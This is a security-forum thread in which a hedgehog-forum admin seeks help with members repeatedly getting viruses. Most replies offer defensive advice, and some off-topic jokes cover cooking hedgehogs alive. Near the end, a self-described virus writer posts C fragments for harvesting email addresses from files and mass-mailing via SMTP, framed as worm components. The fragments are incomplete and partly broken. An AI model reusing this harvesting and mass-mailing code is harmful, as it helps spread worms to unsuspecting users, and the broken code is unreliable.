No... I'm thinking "the internet" and coincidence....
3700 users and a few get a virus?... Far from fantasy?
Printable View
No... I'm thinking "the internet" and coincidence....
3700 users and a few get a virus?... Far from fantasy?
I'm concerned about the one via MSN messenger.
This second one came over msn from a Chad Cortese who is TucknRoll on here. Chad
hasn't got hedgies, I have his, so he doesn't come on anymore but I wonder if this
is coincidence that it came from another CnQ member. Ok, I'm getting paranoid.
lol
Maybe they should have a forum for IT security :p
Tindala :
I believe that TS has a point, and that others here have already said that securing the system will prevent a lot of this rubbish.......
You can copy this
for starters.
Check out some site tutorials on firewalls and anti-virus set-ups [Freeware a lot of them]
Sygate FireWall - free
Grisoft AVG anti-virus - free
together they should give your membership [those that bother :)] SOME protection.
[edit]
from the front page 'Quick Tips'
Couldn't resist.Quote:
Do not open e-mail attachments from strangers, regardless of how enticing the Subject Line or attachment may be.
Spooky :eek:
luck to you.
Thanks...;-) I'll work on this when I get to Phoenix later tonight!!
I really appreciate the "pats on the head" and knowing that (the virus stuff) can be controlled. I'll massage your referenced material to work for my members.
Coincidence? It's the same people getting viruses, only getting them after having words with one certain person and it's happened to them several times. This never happened until this certain person began posting on the CNQ board, got mad and started to threaten people. This sounds like a targeted attack to me. This has happened to me in another MB and I KNOW it was an attack. How it stopped? After several weeks after I left the board for good and stopped posting, the viruses stopped. Granted our members should not be opening attachments without making sure of them first but then we are not computer experts either and never expected an attack such as this on a simple friendly board. Since the people here are supposed to be computer experts or at least more advance in security than the normal layman I came here for help.
I know that anyone caught writing viruses and infecting the internet can be prosecuted. This has happend to someone I know. He recieved probation and is banned from the internet. I know this because I was in court when the sentence was handed down. I drove the guy there!
Thank you to all of those who have tried to help instead of offering critisim.
So get the members to follow SIMPLE security tips, and get your board BACK ...........Quote:
but then we are not computer experts either and never expected an attack such as this on a simple friendly board
YOU drove him there ........... If he was such a l337 guy, why not pick his brains for advice, in conjunction with what you are getting here ?Quote:
I know that anyone caught writing viruses and infecting the internet can be prosecuted. This has happend to someone I know. He recieved probation and is banned from the internet. I know this because I was in court when the sentence was handed down. I drove the guy there!
As for prosecution ............. depends where you live.
As you say, YOU are not IT whizz kids, and not everyone HERE is either, but we tend to take security a little [a LOT] more seriously than most.
Nowadays, if you DON'T take security seriously, you run the risk of running your PC's for someone else.
Spread the word.
[edit]
when you DO start spreading the word ....................
Start with THEM :DQuote:
It's the same people getting viruses,
It's hard to "Pick his brains" when he is dead. He died in a automobile accident. If not then I would have went to him and not bothered anyone on any boards asking for help.
I didn't single anyone out in the post that you are refering to, I don't know why you would single me out by taking my words and quoting them out of contex.
Simple security tips ARE being carried out. Quotation in a previous post on this same page states that three viruses were caught. The ones that got through on this particular attack came from MSN messenger.
Criticism and sarcasm are of no help and frankly I am surprised that you would resort to that.
To re-pay a courtesy.Quote:
Criticism and sarcasm are of no help and frankly I am surprised that you would resort to that.
Jett.
You have to remember this is an international board. Some of us should have gone to bed hours ago. What you read as sarcasm may just be the fact it's bloody late were the poster is. They may also have had a drink or two
:D
Hi All
I am one of the ones that has gotten two viruses. The first one that gave me Miteleader (sp?) I am positive was the troll as I had words with him a few days before. This was weeks ago and I haven't said a word to him or haven't knowingly replied to any of his posts since.
The second one that came over msn yesterday I am beginning to think is just a coincidence.
The person it came from is also a member of the board but he has not been on it in months and has not been on since the troll started. I can't really see that the troll would have chosen an inactive member as his means of sending the virus.
Also I only have msn and the troll seems to talk to people on yahoo. Everyone that I personally have heard that he has threatened or talked to outside of the forum has been on yahoo.
This virus I got yesterday apparently sends itself without needing an attachment opened. The guy I got it from wasn't even home at the time it sent it to everyone on his msn list.
The Bropia worm. Or a variant of. Details at: http://securityresponse.symantec.com...32.bropia.htmlQuote:
This virus I got yesterday apparently sends itself without needing an attachment opened. The guy I got it from wasn't even home at the time it sent it to everyone on his msn list.
What my virus program is telling me I have is
thehedgieden@hotmail [1]. com->(morphine)
cmdrun.exe ->(Morphine)
The first one is just my own hotmail address with [1] and ->(morphine) added to it
I am totally illiterate when it comes to this stuff.
Just wondering - wtf would you guys be fighting about on a board about hedgehogs??
Quote:
Just wondering - wtf would you guys be fighting about on a board about hedgehogs??
hahahahha
Good point Jareds411!!
:thumbsup:
MLF
I think you have this little **** until he/she gets bored with you.
You're best bet now is to make your genuine users less of a target so that he will move on.
He is probably using a poxy so you won't be able to tell where he is coming from and therefore you will not be able to block him by IP without cutting off a large proportion of your user base.
The first thing you can do is get the message out that there is a threat on the board.
If the users are aware there is a threat then they can start to take action.
Give out the steps they should take. Give out the links to the free antivirus and firewall. Tell them to go away and get their machines patched up.
The viruses this ***** are sending out are not unknown and they will be picked up by UP TO DATE antivirus. Give them the name of the virus and a link to Norton.com so they can look up the removal instructions and download the tools if need be.
I know your users are not experts (far from it probably) but they are going to have to learn now.
Being ignorant of what is going is not going to stop the viruses.
You possible have several issues going on with this guy sending out viruses to average users probably with out of date or no AV and these guy are becoming infected and spreading the bug around other users.
Can the registration of thh board be changed prevent registration email addresses to ISP emails only? No hotmail/yahoo etc? This maybe isn't possible I don't know your system.
Can you assign extra mods to shut this guy down quicker?
What about putting out a message to report incidents involving this to a specific email address, probably a hotmail account for that one so the **** doesn't have a good target?
Are there a lot of postings regarding this *****? Is it possible to try to calm this down a bit? The more posting about it the more attention this guy gets and the more likely he is to hang around.
Unless you can your users to take some actions to help themselves they are just going to continue to get shafted.
Greetings,
A small word of advice,this is a huge forum..and your thread's picking up on popularity,50 replies or so w00t lol
Dont let yourself get confused by all the suggestions.As admin/mod,you have to lay down basic security measures even though your forum doesnt deal with computers or security.Why?because now you have someone who DOES know a little bit about computers and to beat him..you have to understand from where he's coming at. Just stick to the basics:
1. Post stickies everywhere:It might make a few people panicky,but trust me,security by obscurity isn't the best way to go about a situation like this.You want your members to be on their toes,not caught unawares.
2. Make everyone download the latest AVs and their definitions..I dont care if they're saying they already have,if they had..they wouldnt be in this mess..the problem you're having is NOT a virus writer by any means.
3. Do the same with firewalls.. Zonealarm(www.zonelabs.com) or Sygate (www.sygate.com) are good places to start.
4. Off the top of my head,also make everyone check for trojans.. get TDS3 (http://tds.diamondcs.com.au/index.php?page=download)
make everyone run scans and then see if you turn up anything.
5. Dont panic?you're starting to sound really worried,which is fair considering what you've been going through,but keeping a cool head goes a long way.
Above all,remember..we can only give advice to you..we're all basically shooting in the dark,you give us symptoms,we can give you probable causes,there're a lot of members here who've already started helping you who're very good at that..but in the end you're going to have to make this work.
Cheers
As a first :
Please post back that you ARE implementing SOME of the measures suggested .........
Until you show that you ARE heeding advice FREELY given, then it is highly likely that it is all you will be receiving from now on in.Quote:
Criticism and sarcasm are of no help and frankly I am surprised that you would resort to that.
Although I cannot see how you call 'it' criticism / sarcasm ............. I call it assistance :p
So, I say again :
Spread the word; and you WILL be suprised just how much of this sh1te can be stopped.
[edit]
also from a quote in this thread ?
It WAS late when I posted [UK] and YES I :drink:
I also study till 03:00 most days, and am up to start work at 06:00.
So if you think I was out of order, go see the padre for a TS slip .........
as stated, this is a HUGE forum, and you are getting a lot of advice / suggestions for free, from people all over the world, and [suprisingly] they are fairly consistent in their prognosis ........................
SECURE YOUR SYSTEMS :)
[edit 2]
No Tiger~, it's not your slip
TS = tuff ****
I'm in PHX at the moment, and on a free terminal until I can check into my hotel room and use my machine.
I will be updating the "Welcome" letter, sending a letter to all registered users, and posting on the "News & Information" area about everyone updating their Virus & Firewall protection.
I will also discuss with the owner of the forum regarding changing some of the USer Requirements, e.g.: no @yahoo/gmail/hotmail accounts. That may not fly, as i even use 3 gmail's (my primary is Starband).
Lastly, I think I will consider offering Mod status to a couple of my more reliable members. This has grown beyond what 3 people can manage.
Sigh,
Sandra (who want's to be home to deal withthis not at a hotel)
When you consider offering Mod status to your "more reliable" members, also consider their computer skills not just their Hedgehog skills (what the heck is a hedgehog anyways? I think we call the gophers in the frozen north :D ). Having someone as a Mod who also has some strong computer/network/Internet skills will go a long way in keeping your board safe.Quote:
Originally posted here by Tindala
I'm in PHX at the moment, and on a free terminal until I can check into my hotel room and use my machine.
I will be updating the "Welcome" letter, sending a letter to all registered users, and posting on the "News & Information" area about everyone updating their Virus & Firewall protection.
I will also discuss with the owner of the forum regarding changing some of the USer Requirements, e.g.: no @yahoo/gmail/hotmail accounts. That may not fly, as i even use 3 gmail's (my primary is Starband).
Lastly, I think I will consider offering Mod status to a couple of my more reliable members. This has grown beyond what 3 people can manage.
Sigh,
Sandra (who want's to be home to deal withthis not at a hotel)
Keep in touch Sandra, people here can and will help you.
Cheers:
PS: I hate hotels too..... :rolleyes:
For DjM's edification:
A hedgehog is a cute spiney little creature that's a chunk larger than a rat but with a much cuter face.
Bear with me tiger, I am posting from my pub, with a few pints down the hatch and using my blackberry (this keyboard is hard enough without the beers).Quote:
Originally posted here by Tiger Shark
For DjM's edification:
A hedgehog is a cute spiney little creature that's a chunk larger than a rat but with a much cuter face.
Anyways, what you discribed still sounds like a gopher only with gel in its fur/hair
Can you eat them?
Yes smoother them with clay and dump in a fire to bake. After a suitable cook time remove from fire. Break open the clayball. The spines should stay attached to the clay leaving you with some cooked meat. By the way, there was, a few years back a hedhog flavoured crisp on the market over hear. Not real just a gimick.Quote:
Can you eat them?
You've got to let them stop SQUEALING first :DQuote:
After a suitable cook time
Hi DjM,
A hedgehog is one of those little creatures that rolls up into a ball to daffle his enemies...a spiney ball kinda like velcro but with pins instead of velcro hooks... :eek:
Hi jinxy,
First you have to slice open the soft underbelly and remove the guts or the meat will get infected and taste nasty...other than that....Yummmmmmm! Anybody got a toothpick ! :D Do they have recipies on their website too?
Hi foxyloxley,
Geeeeezzzz!...that sounds soooooo cruel to cook it while it's still alive....you have to beat it unconscious first with a rock to tenderize it...then cook it ! Sheeeeeesh ! :D
Eg
I'm a older virus writter, and some for my virus don't run actually, but i don't understand for malicious virus writters who send a virus only for molest or appear in papers.
Basically this area is "vudu" for all coders, and i have interesting and exciting! Actually i write some and dangerous virus codes, the difference is i study that, i don't interest be famous.
Now, some virus propagation cause millions in lost for some some some enterprises, that is true? or is a leyend only.
Many AV enterprises take a virus for a good business, it is true, they send a hive ( virus egg) and infect millions of pc around the world two days later they release a removal tool :(), when a independient virus coder send a hive, then he is persecute, ironic? yes.
Now with respect to the original post, and Tindala post, the problem reside onto kernell, the traditional AV don't detect this virus, why, simple: the code "delta" on the ZERO ring kernell level and the AV don't see that.
Some virus implement himself protocols like a tcp, like a smtp and others.
Diagnostic:
Lost of memory ( and virtual memory)
Low processing task
Malfunction in some kernell objects (freeze system and panic [under linuz])
Rare and don't listed port traffic (open ports etc)
A "idiot" or "suck.." bad intentioned messages on the screen (no system form objects)
lost of information ( encrypted data and corrupt files)
Dennied root acces or administrator (windows)
Dennied users acces
Solution:
in the pack of process:
- First: a traffic scanner
- Second:a memory scanner (background process and high objects registration) like a spy
-Third: a comercial AV
then, a expertise coder who use this tools and hunt the non-comecial virus.
Yes, this is only a idea, very difficult but this works only if you don't decide reinstall or recompile the bynaries for kernell system. Or reinstall the system (data server, web server etc)
What is it?
A difficult way, but the secure way for take off a rare no-comercial virus.
Saludos
firewalls and a/vs usually work, but if they come out with new ones everyday, how do we stop them? do..we merely learn from them? and send their attacks back at them? merely for defensive purposes of course. or do we let them keep attacking poor innocent people.? =(
Now, I couldnt be arsed reading the entire 7 pages (Sorry im wasted...) of this thread, but I was just wondering why you think he's writing them? could he not just be using a virus creation kit? - AV's will pick these up.
What does the "virus" do?
lalalala
i2c
Yes, good question, i write a Creation Kit for polimorphic variants, assembler, c++ etc, but the problem with that is:Quote:
Originally posted here by i2c
Now, I couldnt be arsed reading the entire 7 pages (Sorry im wasted...) of this thread, but I was just wondering why you think he's writing them? could he not just be using a virus creation kit? - AV's will pick these up.
What does the "virus" do?
i2c
a virus writter is alone person, underground person, actually i don't. I consider myself for a newbie in virus writting. I learn day by day. But my point in this ask (my ask) is take a lot of my experience in virus creation, virus design for help. i don't say why i decide take this way, help for persons? anyway in the past, now i learn for take the live "happyness" . Suicidal boy? maybe but i learn for the "coding virus" that for malicious code is the wrong way, only i have the necesary weapons for live the obfuscated coding in peace and better.
You see, write a virus code is no a difficult task only you need know how the operating system works.
we have a piece of code:
a simple scanner
/\
< >
\/
Code:char file_parser(const char *filename)
{
HANDLE __file__; //operator HANDLE( ) const throw( ) rEturns the value of the stored handle (ALT)
DWORD __offset__, __heap__, __finder__; //operator DWORD( ) const rEturns the cookie associated with the CComGITPtr object (ALT)
char buf[65535]; // for take a lot of memoRy
__file__ = CreateFile(filename, FILE_SHARE_READ, FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL); // rEturns a handle that can be used to access the object
if (__file__ == NULL || __file__ == INVALID_HANDLE_VALUE) return 1; // i donT need explaiN thiS
//Like a linuz hd0 equal \\.\PHYSICALDRIVE0
__heap__ = 0;
__finder__ = 0;
for (;;) { // wE dont't need run
__offset__ = 0; // how we move how we ask onto buFFer
ReadFile(__file__, buf, sizeof(buf)-2, &__offset__, NULL); // WhY -2 for the first (no last) unsigned int
if (__offset__ == 0 || __offset__ >= sizeof(buf)) break;
__heap__ += __offset__;
buf[__offset__] = 0;
scantext_textcvt(buf, __offset__); //search for "any" stuff do you WaNT
__finder__ += scantext_extract_ats(buf, __offset__);
if ((__finder__ == 0) && (__heap__ > (300*1024))) // really i want a any patrol, no a specific patrol, you see
//if you take a moment for see .EXE and .dll (object) code you learn by the time why is a reall patrol in
//some windows or linuz objects
break;
}
CloseHandle(__file__); // close the "stream"
return 0;
}
If you want send that for mail packets is very simple:
the difficult way:
// queueing for mail transfer packets
static DWORD _stdcall __doomkicker(LPVOID _flag)
{
struct _MAILPROTOCOL_CLS *_MTQ = (struct _MAILPROTOCOL_CLS *)_flag;
InterlockedIncrement(&mythread); // increments the value of the specified variable
if (_MTQ != NULL) {
_MTQ->_state = 1;
mmsender(_MTQ);
_MTQ->_state = 2;
}
if (mythread > 0)
InterlockedDecrement(&mythread); //mythread is the idle for asyncronous sender
ExitThread(0); // <:)
return 0; // zero determine the way for the thread heap
}
the _MAILPROTOCOL_CLS if you preffer..a simple dynamic list
#pragma pack(push, 1)
struct _MAILPROTOCOL_CLS {
struct _MAILPROTOCOL_CLS *next;
unsigned long tick_got;
char _state;
char priority;
char to[1];
};
the easy way:
prototypes
#define BUFFER_DEFAULT_SIZE 4096
#define TIME_STAMP_YES 0
#define TIME_STAMP_NO 1
#define STR_VALUE 0
#define DW_VALUE 1
#define REG_BUFF 100
structures:
typedef struct
{
char* ToAdd;
char* FromAdd;
char* Subject;
char* MsgBody;
}SmtpMsg;
typedef struct
{
char* address;
int port;
}TCPServer;
static FILE *logFile;
char* getNowTime (void)
{
struct tm *nowTime;
time_t aclock;
time (&aclock);
nowTime = localtime (&aclock);
return asctime(nowTime);
}
//principal module (sender)
bool sendData (const char* msg, SOCKET sockInUse, char* rcvBuff)
{
const char* MSG;
int ret;
ZeroMemory (rcvBuff, BUFFER_DEFAULT_SIZE);
MSG = msg;
size_t msgLength;
msgLength = strlen(MSG);
send (sockInUse, MSG, msgLength, 0);
ret = recv (sockInUse, rcvBuff, BUFFER_DEFAULT_SIZE, 0);
if (ret != 0)
if (ret == SOCKET_ERROR)
printf("Connection to SMTP server is now OK" + WSAGetLastError());
return true;
}
ZeroMemory:
The ZeroMemory macro fills a block of memory with zeros.
To avoid undesired effects of optimizing compilers, use the SecureZeroMemory function.
if you don't know what is the ZeroMemory prototype
void ZeroMemory(
PVOID Destination,
SIZE_T Length
);
Parameters
Destination
[in] Pointer to the starting address of the block of memory to fill with zeros.
Length
[in] Size of the block of memory to fill with zeros, in bytes.
Return Values
This function has no return value.
if you don't have idea for send is declared:
int PASCAL FAR send (
IN SOCKET s,
IN const char FAR * buf,
IN int len,
IN int flags);
part of winsock.h
Now, the virus creation need more coding, this is only the first way o any way, really i confused sometimes
what is the better way for attack a virus code (coding) the virus creation tools is the most simple way for
kids and childrens, I take a moment for write asm virus or C trojan horse, but i repeat:
The virus is a better way for learn?
I say yes, all of virus including is a "expertise" knowing for Operating Systems and hardware functionally..
I don't need morality for see malicious coders like a child molesters, that childrens is the future for the real
underground and professional coders. But, this childrens, like me (along time ago) need someone who teach the
only way: best softare, best operating systems (pleasseeee), best games and best persons (machines any..)
Saludos i2c and BesT WisheS
AzRaEL [NuKE]
/\
< >
\/
Yea interesting post, I understand the process of creation, any one that mucks about with code and OS's i believe has the knowledge to do some damaging things. I just wanted to learn more about this persons problem as he was very vague on details!
You seem like the majority of us here at AO, interested in "black arts" but to many morals to use them to cause harm...
Cheers for the post
i2c